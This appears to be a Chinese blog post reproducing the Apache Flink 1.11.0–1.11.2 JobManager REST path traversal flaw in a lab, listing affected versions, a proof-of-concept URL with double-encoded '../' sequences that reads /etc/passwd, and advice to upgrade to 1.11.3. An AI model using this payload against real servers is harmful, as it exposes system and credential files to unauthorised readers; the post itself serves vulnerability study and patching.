Apache Flink jobmanager/logs 目录穿越漏洞

1、漏洞描述

Apache Flink 是一个开源流处理框架,具有强大的流处理和批处理能力

Apache Flink 1.11.0 中引入的一项更改(也在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件

2、漏洞影响范围:

Apache Flink 1.11.0、Apache Flink 1.11.1、Apache Flink 1.11.2

3、漏洞复现:

环境:

kali:192.168.4.157

ubuntu:192.168.4.128

docker

http://192.168.4.128:8081

 

 POC:  /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

参考资料:

4、修复建议:

      升级Flink版本至1.11.3及以上 

 

posted @ 2022-04-23 22:04  kalibb  阅读(158)  评论(0)    收藏  举报